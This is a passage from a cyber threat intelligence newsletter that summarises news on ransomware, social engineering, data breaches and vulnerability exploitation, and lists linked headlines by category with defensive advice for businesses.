Our review of specialist and general media continues to show that cyber security relies on, and affects, people, especially employees. Groups such as Scattered Spider exploit workplace platforms like Teams to deceive employees, and Gen Z are twice as likely to fall for attacks. QR code-based scams (Quishing) are also increasing, and research shows over 80% of data breaches involve HR documents.
Ransomware remains a serious threat, often enabled by employee actions or insecure systems. Around 40% of incidents include threats of physical harm, and a new ransomware group is targeting multiple countries using techniques including voice phishing. Other attacks continue to cause disruption; for example, Seychelles Commercial Bank suspended internet banking following a cyber incident that led to leaked data.
Technology remains essential. A report highlights the importance of keeping systems updated and maintaining strong detection and response capabilities. Many exploited vulnerabilities are old, yet a third are exploited within a day of disclosure. Looking ahead, AI and quantum computing present emerging risks that must be addressed now.
Our guidance remains unchanged. Awareness and strong controls across people, operations and technology are essential. Employees must be recognised as central to both your cyber risk and resilience.
Top Cyber Stories of the Last Week
HR Documents Appear in 82% of All Data Breaches
New research by Lab 1 has found that HR documents are present in 82% of all data breaches, second only to finance. These files often contain personal information such as addresses and employment history, making them attractive to cyber criminals. Such data can be misused to create synthetic identities or convincing phishing attacks. As cyber threats grow more sophisticated, HR teams are urged to treat employee data protection as a shared responsibility alongside IT. One-off training is not enough; building security requires continuous action and closer collaboration between HR and security leaders.
The Scattered Spider Ransomware Group Is Infiltrating Slack and Microsoft Teams to Target Vulnerable Employees
Scattered Spider, a well-known cyber crime group, has escalated its activities by infiltrating workplace platforms such as Slack and Microsoft Teams to target employees. The group uses convincing impersonation tactics, often posing as internal staff to trick IT teams into resetting passwords or bypassing multifactor authentication. It has also joined internal calls to gather intelligence and adapt its methods in real time. UK and US firms have been hit hardest, with sectors from retail to aviation impacted. Authorities urge firms to adopt phishing-resistant authentication, monitor suspicious logins and keep offline backups to reduce exposure to data theft and operational disruption.
Gen Z Falls for Scams 2x More Than Older Generations
Recent studies reveal that Gen Z is twice as likely to fall for online scams compared to older generations, posing a growing cyber security risk to employers. Their high digital fluency often leads to risky behaviours such as password reuse, multitasking across multiple jobs, and using personal devices for work. As they increasingly rely on freelance and remote roles, attackers exploit this blend of work and personal activity through phishing emails and impersonation scams. Poor credential hygiene and unapproved software use further widen the risk to businesses, especially where bring-your-own-device and remote access are common.
https://www.darkreading.com/cyber-risk/gen-z-scams-2x-more-older-generations
Millions Hit in Quishing Attacks as Malicious QR Codes Surge; How to Stay Safe
Quishing, a form of phishing using malicious QR codes, is on the rise, with over 26 million people reportedly directed to fake websites that harvest passwords, payment details or install harmful software. These codes are often placed in public spaces like posters or parking meters and are difficult to visually distinguish from legitimate ones. A recent study found that over a quarter of all malicious links are now delivered via QR codes, reflecting a shift away from traditional email scams. As QR codes were never designed with security in mind, extra caution is essential when scanning unfamiliar ones.
Ransomware Attacks Escalate to Physical Threats Against Executives
Ransomware attacks are becoming increasingly aggressive, with a recent report from Semperis showing 40% of incidents now involving threats of physical harm to executives and nearly half involving threats to report the victim to regulators. In the US, 81% of affected firms paid a ransom, over half of those paid more than once, and 15% received no usable decryption key. Victims often face repeated attacks, with 73% suffering multiple incidents. Disruption from ransomware continues to impact operations, causing job losses, data breaches and cancelled insurance. Despite growing resistance to extortion, the majority of targeted organisations still paid, highlighting the need to invest in cyber resilience.
https://www.infosecurity-magazine.com/news/ransomware-attacks-escalate/
Ransomware Up 179%, Credential Theft Up 800%: 2025’s Cyber Threat Landscape Intensifies
Flashpoint’s midyear report paints a stark picture of the cyber threat landscape in 2025, with ransomware incidents up 179% and credential theft soaring by 800%. The first six months saw 1.8 billion credentials stolen and over 9 billion records exposed, largely due to unauthorised access. Manufacturing, technology and legal sectors were particularly affected. Vulnerability disclosures also rose sharply, with 35% of known flaws already exploited. A significant backlog in vulnerability analysis has left many organisations exposed. The report stresses the need for faster patching and better threat intelligence to help firms stay ahead in a rapidly evolving risk environment.
New Chaos Ransomware Emerges, Launches Wave of Attacks
A new ransomware group known as Chaos has launched a wave of opportunistic cyber attacks, affecting organisations across the US, UK, New Zealand and India. First emerging in early 2025, Chaos employs a combination of voice phishing, remote access tools and file encryption to extract data and demand ransoms, typically in the hundreds of thousands of dollars. The group’s tactics include offering 'incentives' for payment and threatening further disruption such as denial-of-service attacks if demands are refused. Researchers believe the gang may have ties to previous threat actors, citing similarities in methods and communication style.
https://www.infosecurity-magazine.com/news/chaos-ransomware-wave-attacks/
Seychelles Commercial Bank Reported Cyber Security Incident
Seychelles Commercial Bank has confirmed a recent cyber security incident that led to a temporary suspension of internet banking services. Although no financial losses were reported, personal data of online banking customers was exposed, including names, contact details, account types and balances. External researchers who analysed the leaked data noted that some affected accounts were labelled as government-related. The bank has advised customers to use ATMs or visit branches while services are restored. The incident has been formally acknowledged by the Central Bank of Seychelles and may draw wider attention due to the country’s role in offshore financial services.
Third of Exploited Vulnerabilities Weaponised Within a Day of Disclosure
VulnCheck’s latest data shows that nearly a third of known exploited software vulnerabilities in 2025 were weaponised within 24 hours of disclosure, up from around a quarter in 2024. Microsoft and Cisco were the most targeted vendors, with content management systems, network devices and server software making up the bulk of affected categories. Russian and Iranian threat actors significantly increased their activity, while Chinese and North Korean groups saw declines. Of the 181 unique vulnerabilities used by recognised threat actors, most had already been exploited before 2025, reinforcing the need for prompt patching and ongoing vigilance.
https://www.infosecurity-magazine.com/news/third-kev-exploited/
Sam Altman Warns That AI Is About to Cause a Massive "Fraud Crisis" in Which Anyone Can Perfectly Imitate Anyone Else
OpenAI’s CEO has warned of an imminent fraud crisis driven by artificial intelligence, where scammers will be able to convincingly mimic voices and even video likenesses to impersonate individuals. Speaking to the US Federal Reserve, he raised concerns about financial institutions still relying on voice authentication, which AI tools can now easily defeat. Real-world cases already show AI being used to trick employees and impersonate officials. While OpenAI claims it is not developing impersonation tools, Altman cautioned that others will, and that organisations must urgently update their authentication methods to avoid being exposed to this growing threat.
https://futurism.com/sam-altman-ai-fraud-crisis-imitate
Getting a Cyber Security Vibe Check on Vibe Coding
Vibe coding, where natural language prompts are used to generate code via AI, is gaining traction but poses clear security risks. A recent study found AI tools made insecure coding choices nearly half the time, with Java faring worst at a 71% failure rate. Common issues include outdated software components, flawed access controls, and unpredictable behaviours like data exposure or deletion. Experts stress that while AI coding tools may speed up prototyping, they remain immature for secure production use. Human code review, vulnerability scanning, and clear development guardrails remain essential to safely benefit from this fast-evolving technology.
https://www.darkreading.com/application-security/cybersecurity-vibe-check-vibe-coding
The Growing Impact of AI and Quantum on Cyber Security
Artificial intelligence and quantum computing are reshaping the digital landscape, offering major efficiency gains but introducing serious cyber security risks. AI-driven cyber attacks are becoming more frequent and harder to detect, with one in four CISOs reporting AI-based threats in the past year. At the same time, quantum computing threatens to undermine current encryption standards, raising urgent concerns about future data protection. Despite these risks, few organisations have a clear plan to adapt. To stay resilient, firms must invest in proactive cyber security, improve workforce skills, and prepare for a post-quantum future before today’s safeguards become obsolete.
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware up 179%, credential theft up 800%: 2025’s cyber onslaught intensifies | CSO Online
After BlackSuit is taken down, new ransomware group Chaos emerges - Ars Technica
New Chaos Ransomware Emerges, Launches Wave of Attacks - Infosecurity Magazine
Ransomware will thrive until we change our strategy - Help Net Security
Ransomware is on the rise, thanks in part to GenAI - Verdict
Ransomware Attacks Escalate to Physical Threats Against Executives - Infosecurity Magazine
'I am afraid of what's next,' ex-ransomware negotiator says • The Register
Scattered Spider is running a VMware ESXi hacking spree
Scattered Spider Hacker Arrests Halt Attacks, But Copycat Threats Sustain Security Pressure
The State of Ransomware – Q2 2025 - Check Point Research
Qilin Ransomware Gain Traction Following Legal Assistance Option for Ransomware Affiliates
Ransomware Payment Bans: Prevention Strategy or Misguided Policy? - IT Security Guru
New UK ransomware rules could affect payments firms
Ransomware upstart Gunra goes cross-platform with encryption upgrades | CSO Online
Cyber criminals ‘Spooked’ After Scattered Spider Arrests - Infosecurity Magazine
Ransomware groups are blurring the line between cybercrime and ‘hacktivism’ - The Economic Times
Ransomware attacks in education jump 23% year over year | Higher Ed Dive
Ransomware ban won't save councils or NHS without urgent cyber investment
FunkSec Ransomware Decryptor Released Free to Public After Group Goes Dormant
Ransomware Victims
NHS provider nears collapse a year after cyberattack • The Register
NASCAR Confirms Personal Information Stolen in Ransomware Attack - SecurityWeek
SafePay ransomware threatens to leak 3.5TB of Ingram Micro data
Why is the National Guard deployed for Minnesota cyberattack? | Stars and Stripes
RTÉ investigating potential cyber security incident – The Irish Times
Minnesota activates National Guard after St. Paul cyberattack
Phishing & Email Based Attacks
Millions hit in quishing attacks as malicious QR codes surge — how to stay safe | Tom's Guide
Attackers Exploit M365 for Internal Phishing | Proofpoint US
Gen Z Falls for Scams 2x More Than Older Generations
Got a suspicious Amazon refund text? Don't click the link - it's a scam | ZDNET
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Cyber attacks target email accounts of senior journalists - Press Gazette
Phishing Scams Hit Aviation Execs, Causing Six-Figure BEC Losses
How attackers are still phishing "phishing-resistant" authentication
2025 Email Threats: AI Phishing Demands Multi-Layered Defences
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Phishing Scams Hit Aviation Execs, Causing Six-Figure BEC Losses
Other Social Engineering
Millions hit in quishing attacks as malicious QR codes surge — how to stay safe | Tom's Guide
Gen Z Falls for Scams 2x More Than Older Generations
Inside a Real Clickfix Attack: How This Social Engineering Hack Unfolds
QR Code Quishing Scams Surge 50%: Tips to Protect Your Data
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Top spy laments LinkedIn profiles that reveal defence work • The Register
Fraud, Scams and Financial Crime
Gen Z Falls for Scams 2x More Than Older Generations
Email Payment Scams: Assume the Worst | Williams Mullen - JDSupra
Got a suspicious Amazon refund text? Don't click the link - it's a scam | ZDNET
11,500 UK companies struck off Companies House register after crackdown - National Crime Agency
Scammers Now Using Google Forms To Hunt Crypto Victims
Who’s Really Behind the Mask? Combatting Identity Fraud - SecurityWeek
Even Scammers Are Turning To AI To Negotiate With Victims
Thai-Cambodian conflict partly provoked by cyber-scams • The Register
Pew: Three quarters of Americans targeted weekly in online scams - UPI.com
Russian soldiers scammed and robbed of war cash on return from Ukraine - BBC News
Artificial Intelligence
Ransomware is on the rise, thanks in part to GenAI - Verdict
Getting a Cyber Security Vibe Check on Vibe Coding
Even Scammers Are Turning To AI To Negotiate With Victims
Overcoming Risks from Chinese GenAI Tool Usage
From Ex Machina to Exfiltration: When AI Gets Too Curious - SecurityWeek
AI is here, security still isn’t - Help Net Security
Azure AI Speech needs seconds of audio to clone voices • The Register
The Growing Impact Of AI And Quantum On Cyber Security
Microsoft Copilot Rooted to Gain Unauthorized Root Access to its Backend System
Microsoft wants you to chat with its browser now - but can you trust this Copilot? | ZDNET
Browser Extensions Pose Serious Threat to Gen-AI Tools Handling Sensitive Data - SecurityWeek
Not just YouTube: Google is using AI to guess your age based on your activity - everywhere | ZDNET
AI-Generated Linux Miner 'Koske' Beats Human Malware
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
British 999 caller's voice cloned by Russian network using AI - BBC News
2FA/MFA
Malware
Sophisticated Shuyal Stealer Targets 19 Browsers
AI-Generated Linux Miner 'Koske' Beats Human Malware
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Russian Intelligence blamed for malware tool
Over 200 Malicious Open Source Packages Traced to Lazarus Campaign - Infosecurity Magazine
Report Links Chinese Companies to Tools Used by State-Sponsored Hackers - SecurityWeek
Hafnium Tied to Advanced Chinese Surveillance Tools - Infosecurity Magazine
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Hackers Breach Toptal GitHub, Publish 10 Malicious npm Packages With 5,000 Downloads
Do Macs Get Viruses? How to Scan for a Mac Virus - CNET
Bots/Botnets
Secrets are leaking everywhere, and bots are to blame - Help Net Security
Mobile
ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials
Android Malware Targets Banking Users Through Discord Channels - Infosecurity Magazine
Denial of Service/DoS/DDoS
DDoS-protection crisis looms as attacks grow – Computerworld
Internet of Things – IoT
Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access
Data Breaches/Leaks
Allianz Life: Insurance giant says most US customer data stolen in cyber-attack - BBC News
Seychelles Commercial Bank Reported Cybersecurity Incident
HR documents appear in 82% of all data breaches, finds Lab 1 | UNLEASH
French telecom giant Orange discloses cyber attack
IR35 advisor Qdos confirms a data leak to techie clients • The Register
French defence firm Naval Group investigates cyber leak
How Military Devices are Slipping Through the Cracks
Hackers Allegedly Breach Nokia’s Internal Network – DataBreaches.Net
Tea Dating Advice app spills sensitive data • Graham Cluley
NASCAR Confirms Personal Information Stolen in Ransomware Attack - SecurityWeek
Lovense sex toy app flaw leaks private user email addresses
Organised Crime & Criminal Actors
The Young & the Restless: Cybercriminals Raise Concerns
Thai-Cambodian conflict partly provoked by cyber-scams • The Register
Hackers plant 4G Raspberry Pi on bank network in failed ATM heist
US Now Top Target for Dark Web Cyberthreats
A US cybercrime group is targeting banks and credit unions | American Banker
FBI opens first office in New Zealand ‘to counter China and cybercrime’ | FBI | The Guardian
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Scammers Now Using Google Forms To Hunt Crypto Victims
AI-Generated Linux Miner 'Koske' Beats Human Malware
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Insider Risk and Insider Threats
What the Coinbase Breach Says About Insider Risk
Insurance
Supply Chain and Third Parties
Your supply chain security strategy might be missing the biggest risk - Help Net Security
Hackers Allegedly Breach Nokia’s Internal Network – DataBreaches.Net
Cloud/SaaS
Attackers Exploit M365 for Internal Phishing | Proofpoint US
Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials
Microsoft exec admits it 'cannot guarantee' data sovereignty • The Register
UK to rein in Microsoft, AWS with 'strategic market status' • The Register
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Microsoft investigates outage affecting Microsoft 365 admin center
Outages
Microsoft investigates outage affecting Microsoft 365 admin center
Global Starlink outage disrupts Ukrainian front lines
Starlink Faces Another Brief Outage | PCMag
Why did the air traffic control outage cause so much havoc? - BBC News
Encryption
The Growing Impact Of AI And Quantum On Cybersecurity
Google says UK government has not demanded an encryption backdoor for its users' data | TechCrunch
A UK Government Order Threatens the Privacy and Security of All Internet Users - Internet Society
Linux and Open Source
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Passwords, Credential Stuffing & Brute Force Attacks
Experts Detect Multi-Layer Redirect Tactic Used to Steal Microsoft 365 Login Credentials
Ransomware up 179%, credential theft up 800%: 2025’s cyber onslaught intensifies | CSO Online
Why stolen credentials remain cyber criminals’ tool of choice - Help Net Security
ToxicPanda Android Banking Malware Infected 4500+ Devices to Steal Banking Credentials
Social Media
Top spy laments LinkedIn profiles that reveal defence work • The Register
Malvertising
Regulations, Fines and Legislation
The top 3 cybersecurity risks posed by the Online Safety Act and age verification | Tom's Guide
UK to rein in Microsoft, AWS with 'strategic market status' • The Register
VPNs can get around the UK's age verification laws – but is it necessary? | Tom's Guide
UK Online Safety Act Triggers 1400% VPN Surge Amid Ban Fears
Internet age verification begins rollout, and it's as bad as you'd expect
A UK Government Order Threatens the Privacy and Security of All Internet Users - Internet Society
Ransomware ban won't save councils or NHS without urgent cyber investment
UK web surfers warned of cyber security risks following new Online Safety Act - Stoke-on-Trent Live
New UK ransomware rules could affect payments firms
A Court Ruling on Bug Bounties Just Made the Internet Less Safe - Infosecurity Magazine
Banning VPNs to protect kids? Good luck with that • The Register
Government layoffs are making us less safe in cyberspace, experts fear - Nextgov/FCW
Models, Frameworks and Standards
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
CISA Unveils Eviction Strategies Tool to Aid Incident Response - Infosecurity Magazine
Careers, Working in Cyber and Information Security
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
Cyber security professionals facing burnout as threats mount - CIR Magazine
Law Enforcement Action and Take Downs
Scattered Spider Hacker Arrests Halt Attacks, But Copycat Threats Sustain Security Pressure
Cyber criminals ‘Spooked’ After Scattered Spider Arrests - Infosecurity Magazine
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Top spy laments LinkedIn profiles that reveal defence work • The Register
'Fire Ant' Cyber Spies Compromise Siloed VMware Systems
Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor
Kremlin goons caught abusing local ISPs to spy on diplomats • The Register
Russia's Secret Blizzard APT Gains Embassy Access
Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats | Microsoft Security Blog
US Army Building Global IT Warfighting Platform To Prepare for Cyber Warfare | AFCEA International
Nation State Actors
Microsoft’s software licensing playbook is a national security risk | CyberScoop
China
Microsoft’s software licensing playbook is a national security risk | CyberScoop
Top spy laments LinkedIn profiles that reveal defence work • The Register
Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments
'Fire Ant' Cyber Spies Compromise Siloed VMware Systems
Report Links Chinese Companies to Tools Used by State-Sponsored Hackers - SecurityWeek
Hafnium Tied to Advanced Chinese Surveillance Tools - Infosecurity Magazine
Overcoming Risks from Chinese GenAI Tool Usage
Chinese Hackers Weaponizes Software Vulnerabilities to Compromise Their Targets
CISA to Release Salt Typhoon Report on Telecom Security
FBI opens first office in New Zealand ‘to counter China and cybercrime’ | FBI | The Guardian
Scoop: US intelligence intervened with DOJ to push HPE-Juniper merger
Chinese Researchers Suggest Lasers and Sabotage to Counter Musk’s Starlink Satellites - SecurityWeek
Russia
Top spy laments LinkedIn profiles that reveal defence work • The Register
Kremlin goons caught abusing local ISPs to spy on diplomats • The Register
Russia's Secret Blizzard APT Gains Embassy Access
Frozen in transit: Secret Blizzard’s AiTM campaign against diplomats | Microsoft Security Blog
Russian Intelligence blamed for malware tool
Global Starlink outage disrupts Ukrainian front lines
British 999 caller's voice cloned by Russian network using AI - BBC News
Cyber Espionage Campaign Hits Russian Aerospace Sector Using EAGLET Backdoor
Russian soldiers scammed and robbed of war cash on return from Ukraine - BBC News
Pro-Ukraine Hacktivists Ground Dozens of Aeroflot Flights - Infosecurity Magazine
Who is Silent Crow? Pro-Ukraine hackers take down Russian airline Aeroflot | The Independent
Iran
North Korea
Over 200 Malicious Open Source Packages Traced to Lazarus Campaign - Infosecurity Magazine
N. Korean Hackers Used Job Lures, Cloud Account Access, and Malware to Steal Millions in Crypto
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Ransomware groups are blurring the line between cybercrime and ‘hacktivism’ - The Economic Times
Who is Silent Crow? Pro-Ukraine hackers take down Russian airline Aeroflot | The Independent
Tools and Controls
The top 3 cyber security risks posed by the Online Safety Act and age verification | Tom's Guide
How the Browser Became the Main Cyber Battleground
Microsoft’s software licensing playbook is a national security risk | CyberScoop
VPNs can get around the UK's age verification laws – but is it necessary? | Tom's Guide
A Court Ruling on Bug Bounties Just Made the Internet Less Safe - Infosecurity Magazine
DDoS-protection crisis looms as attacks grow – Computerworld
Getting a Cyber Security Vibe Check on Vibe Coding
Security pros drowning in threat-intel data • The Register
How to discover and manage shadow APIs | TechTarget
Another top vibe coding platform has some worrying security flaws - here's what we know | TechRadar
OWASP Launches Agentic AI Security Guidance - Infosecurity Magazine
UK web surfers warned of cyber security risks following new Online Safety Act - Stoke-on-Trent Live
Alert Fatigue, Data Overload, and the Fall of Traditional SIEMs
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
CISA Unveils Eviction Strategies Tool to Aid Incident Response - Infosecurity Magazine
Banning VPNs to protect kids? Good luck with that • The Register
Other News
How the Browser Became the Main Cyber Battleground
The food supply chain has a cybersecurity problem - Help Net Security
Minnesota activates National Guard after St. Paul cyberattack
Is retail a sitting duck for cybercriminals? | Retail Week
Intelligence sharing: The boost for businesses | IT Pro
World told cyber threats must be tackled
The legal minefield of hacking back - Help Net Security
The final frontier of cybersecurity is now in space - Help Net Security
Service Levels for MSSPs: Elevating Security-Specific Services | MSSP Alert
Vulnerability Management
Third of Exploited Flaws Weaponized Within a Day of Disclosure - Infosecurity Magazine
Chinese Hackers Weaponizes Software Vulnerabilities to Compromise Their Targets
Double Whammy: When Insecure Code Meets Burned-Out Cybersecurity Teams - The Daily Upside
Spikes in malicious activity precede new security flaws in 80% of cases
Vulnerabilities
Exploit available for critical Cisco ISE bug exploited in attacks
Another top vibe coding platform has some worrying security flaws - here's what we know | TechRadar
Fire Ant Exploits VMware Flaws to Compromise ESXi Hosts and vCenter Environments
Hackers Exploit SAP Vulnerability to Breach Linux Systems and Deploy Auto-Color Malware
Scattered Spider is running a VMware ESXi hacking spree
Microsoft: macOS Sploitlight flaw leaks Apple Intelligence data
Apple fixed a zero-day exploited in attacks against Google Chrome users
Google Patches Vulnerability That Let Anyone Hide Search Results
Critical Flaws in WordPress Plugin Leave 10,000 Sites Vulnerable - Infosecurity Magazine
CISA flags PaperCut RCE bug as exploited in attacks, patch now
New Lenovo UEFI firmware updates fix Secure Boot bypass flaws
Hackers Exploit Critical WordPress Theme Flaw to Hijack Sites via Remote Plugin Install
Unpatched flaw in EoL LG LNV5110R cameras lets hackers gain Admin access
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 25 July 2025
Black Arrow Cyber Threat Intelligence Briefing 25 July 2025:
-158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Employee’s Weak Password
-Hackers Fooled Cognizant Help Desk, Says Clorox in $380M Cyber Attack Lawsuit
-US Nuclear Weapons Agency ‘Among 400 Organisations Breached by Chinese Hackers’ Exploiting Microsoft SharePoint Vulnerability
-Europe Sees Cyber Attacks Surge Amid Geopolitical Tensions
-68% of Organisations Experienced Data Leakage from Employee AI Usage
-Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
-Cyber Turbulence Ahead as Airlines Strap In for a Security Crisis
-Nearly Half of Managed Service Providers (MSPs) Have Dedicated Kitty for Ransomware Incidents
-UK Confirms Ransomware Payment Ban for Public Sector and CNI
-University Student Who Sold More than a Thousand Phishing Kits to Fraudsters is Jailed
-$15M Reward Offered as American Woman Jailed in North Korea IT Worker Scam
-UK Announces Sanctions Against Russian Cyber Units Over Threats to Europe
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
Our review of cyber security intelligence from specialist and public media this week starts with details of three recently disclosed attacks, including an attack causing the collapse of a firm that was almost 160 years old. The attacks were attributed to weak passwords and verification controls, and in one case it was the exploit of a vulnerability in on-premises SharePoint. We share details of a warning of increased attacks during the summer travel season, and the high percentage of organisations suffering data leakage when employees use AI tools often in an unauthorised manner.
We report on a survey that found almost half of IT managed service providers have funds allocated for paying ransoms, while the UK government has banned public sector and critical national infrastructure organisations from paying ransoms. We include reports of increased attacks in the airline sector, and more widely across Europe as a result of the geopolitical landscape. We also include news of successful legal action against cyber attackers including a student who sold phishing kits, and a US citizen who was helping North Koreans to infiltrate organisations as fake IT workers, as well as UK government sanctions against attackers in the Russian military.
Top Cyber Stories of the Last Week
158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Employee’s Weak Password
The collapse of a 158-year-old company in the UK, KNP Logistics, highlights how even a single weak password can devastate an entire business. Hackers exploited poor password hygiene to deploy ransomware, halting operations and forcing the firm into administration. The attack exposed wider issues: outdated systems, lack of multi-factor authentication, and insufficient user training, all of which allowed cyber criminals to move freely within the network. With over 700 jobs lost and supply chains disrupted, KNP’s fate is a stark warning: even well-established companies are at risk when basic cyber security measures are overlooked. Strong credentials and proactive defence are not optional; they are business-critical.
Hackers Fooled Cognizant Help Desk, Says Clorox in $380M Cyber Attack Lawsuit
US manufacturer Clorox has filed a $380 million lawsuit against IT provider Cognizant, alleging gross negligence in a cyber attack that severely disrupted its operations. The claim centres on a help desk agent who reset credentials without verifying identity, allowing criminals to access Clorox’s systems. This led to halted manufacturing, product shortages and a lengthy recovery effort. Clorox says the attackers repeated the tactic to gain deeper access, including into IT security accounts. It further accuses Cognizant of failing to follow agreed procedures and compounding the damage through a poor incident response, with underqualified support and delayed containment efforts. Cognizant have refuted Clorox’s version of events.
US Nuclear Weapons Agency ‘Among 400 Organisations Breached by Chinese Hackers’ Exploiting Microsoft SharePoint Vulnerability
Microsoft has confirmed that several China-linked hacking groups have exploited security flaws in its on-premises SharePoint servers, resulting in breaches at over 400 organisations, including US government agencies. The National Nuclear Security Administration was reportedly among those affected. Microsoft has issued security updates and is urging all users to apply them, warning that attacks are likely to continue. SharePoint remains widely used by large organisations for document collaboration, making the scale of the threat particularly concerning for those operating older systems.
Europe Sees Cyber Attacks Surge Amid Geopolitical Tensions
Check Point has reported a sharp global rise in cyber attacks, with weekly incidents reaching nearly 2,000 per organisation; a 143% increase over four years. Europe saw the steepest annual growth, up 22%, driven by geopolitical tensions and fragmented regulation. Sectors under sustained pressure include education, government, and telecommunications, with education alone facing over 4,300 weekly attacks. One in four ransomware attacks now affect European firms, with business services and manufacturing the most targeted. The report warns that a reactive stance is no longer viable and urges a prevention-first approach with layered defences and clear visibility of threats.
https://cybernews.com/security/cyberattacks-surge-in-north-america-and-europe/
68% of Organisations Experienced Data Leakage from Employee AI Usage
A recent survey has found that 68% of organisations have experienced data leakage incidents linked to staff sharing sensitive information with AI tools. This comes despite 90% of respondents expressing confidence in their existing cyber security controls. Only 23% of organisations have implemented dedicated AI security policies. Looking ahead, 80% of respondents said that building a strong internal security culture remains their biggest challenge. As AI adoption accelerates, many security leaders are shifting their focus from traditional operations to strengthening infrastructure and staff awareness, particularly in light of rising ransomware threats and risks tied to third-party AI suppliers.
Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
Mobile security provider Zimperium has warned of a sharp rise in mobile-related cyber threats during the busy summer travel season. Over 5 million unsecured public Wi-Fi networks have been identified globally in 2025, with a third of users still connecting to them. Mobile devices, now a key access point for corporate data, are increasingly exposed to risks such as phishing disguised as travel updates, malicious apps, and data theft via public Wi-Fi. The threat is particularly high in Southeast Asia and across major cities. Organisations are urged to strengthen mobile defences and ensure employee devices remain protected while travelling.
Cyber Turbulence Ahead as Airlines Strap In for a Security Crisis
Cyber threats targeting the aviation sector are increasing in both frequency and severity, driven by greater system connectivity and heightened geopolitical tensions. Recent attacks have disrupted flights, exposed sensitive passenger data, and caused significant financial losses. Ransomware activity alone has risen by 600% over the past year. Regulatory bodies across the US, EU and globally are strengthening cyber security standards, with mandatory requirements due by 2025. However, fragmented compliance obligations, ageing technology, and widespread reliance on social engineering tactics continue to expose the industry. Despite higher-than-average cyber security investment, effective staff training and better supply chain oversight remain critical.
https://www.helpnetsecurity.com/2025/07/21/aviation-industry-cybersecurity-crisis/
Nearly Half of Managed Service Providers (MSPs) Have Dedicated Kitty for Ransomware Incidents
A multinational survey reports that nearly half of managed service providers (MSPs) have set aside funds specifically for ransomware payments, despite growing pressure from insurers and governments to avoid doing so. The survey found that 45% had a dedicated budget for this, while 36% rely on cyber insurance. However, 11% had no financial safeguards in place at all. Concerns are now shifting toward artificial intelligence, with 67% of MSPs reporting AI-driven attacks last year. As AI threats escalate in scale and sophistication, 84% of MSP clients now expect their providers to manage cyber security as part of their core services, underscoring the need for proactive defences.
UK Confirms Ransomware Payment Ban for Public Sector and CNI
The UK government will ban public sector and critical national infrastructure organisations from paying ransomware demands, following strong support during a public consultation. The aim is to deter attackers by removing financial incentives and better protect essential services like healthcare, education and transport. Alongside this, a new mandatory reporting regime will be introduced to help law enforcement gather intelligence and disrupt criminal networks. However, some experts have raised concerns that these measures could lead to underreporting, misuse of third parties, or increased pressure on private sector firms still permitted to pay, potentially creating a two-tier risk landscape.
https://www.infosecurity-magazine.com/news/uk-ransomware-payment-ban-public/
University Student Who Sold More than a Thousand Phishing Kits to Fraudsters is Jailed
A 21-year-old university student has been jailed for seven years after selling over 1,000 phishing kits that enabled criminals to impersonate legitimate organisations and steal personal and financial information. The kits, distributed via encrypted platforms, targeted 69 institutions across 24 countries, contributing to an estimated £100 million in global losses. Authorities described the operation as highly organised, with the individual offering ongoing technical support to other fraudsters. This case underscores how cyber criminals are monetising phishing tools at scale and highlights the growing need for organisations to protect against deceptive online tactics designed to exploit customers and brand trust.
$15M Reward Offered as American Woman Jailed in North Korea IT Worker Scam
